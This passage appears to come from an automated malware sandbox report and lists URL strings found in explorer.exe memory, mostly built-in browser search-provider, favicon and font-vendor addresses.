    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://es.ask.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.aol.in/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.atlas.cz/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.auction.co.kr/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.auone.jp/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.books.com.tw/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.books.com.tw/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.centrum.cz/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.centrum.cz/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.chol.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.chol.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.cn.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.daum.net/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.daum.net/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.dreamwiz.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.dreamwiz.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.ebay.co.uk/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.ebay.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.ebay.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.ebay.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.ebay.es/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.ebay.fr/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.ebay.in/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.ebay.it/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.empas.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.empas.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.espn.go.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.gamer.com.tw/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.gamer.com.tw/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.gismeteo.ru/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.goo.ne.jp/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.goo.ne.jp/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.hanafos.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.hanafos.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.interpark.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.ipop.co.kr/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.ipop.co.kr/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.live.com/results.aspx?q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.livedoor.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.livedoor.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.lycos.co.uk/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.lycos.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.lycos.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.msn.com/results.aspx?q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.nate.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.naver.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.naver.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.nifty.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.orange.co.uk/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.orange.co.uk/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.rediff.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.rediff.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.seznam.cz/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.seznam.cz/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.sify.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.yahoo.co.jp
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.yahoo.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search.yam.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search1.taobao.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://search2.estadao.com.br/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://searchresults.news.com.au/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://service2.bfast.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://sitesearch.timesonline.co.uk/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://so-net.search.goo.ne.jp/
    Source: explorer.exe, 00000008.00000000.1206028667.0000000007A37000.00000004.00000001.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://suche.aol.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://suche.freenet.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://suche.freenet.de/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://suche.lycos.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://suche.t-online.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://suche.web.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://suche.web.de/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238355438.0000000005B00000.00000002.00000001.sdmp | String found in binary or memory: http://treyresearch.net
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://tw.search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://udn.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://udn.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://uk.ask.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://uk.ask.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://uk.search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://vachercher.lycos.fr/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://video.globo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://video.globo.com/favicon.ico
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.dr | String found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://web.ask.com/
    Source: explorer.exe, 00000008.00000002.1238355438.0000000005B00000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.com
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.abril.com.br/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.abril.com.br/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.alarabiya.net/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.alarabiya.net/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.amazon.co.jp/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.amazon.co.uk/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.amazon.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.amazon.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.aol.com/favicon.ico
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.arrakis.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.arrakis.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.asharqalawsat.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ask.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.auction.co.kr/auction.ico
    Source: explorer.exe, 00000008.00000000.1206028667.0000000007A37000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.baidu.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.baidu.com/favicon.ico
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.cdiscount.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.cdiscount.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ceneo.pl/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.ceneo.pl/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.cjmall.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.cjmall.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.clarin.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.cnet.co.uk/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.cnet.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.docUrl.com/bar.htm
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.etmall.com.tw/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.excite.co.jp/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.expedia.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.expedia.com/favicon.ico
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.gismeteo.ru/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.co.in/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.co.jp/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.co.uk/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.br/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.sa/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com.tw/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.cz/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.es/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.fr/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.it/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.pl/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.ru/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmp | String found in binary or memory: http://www.google.si/
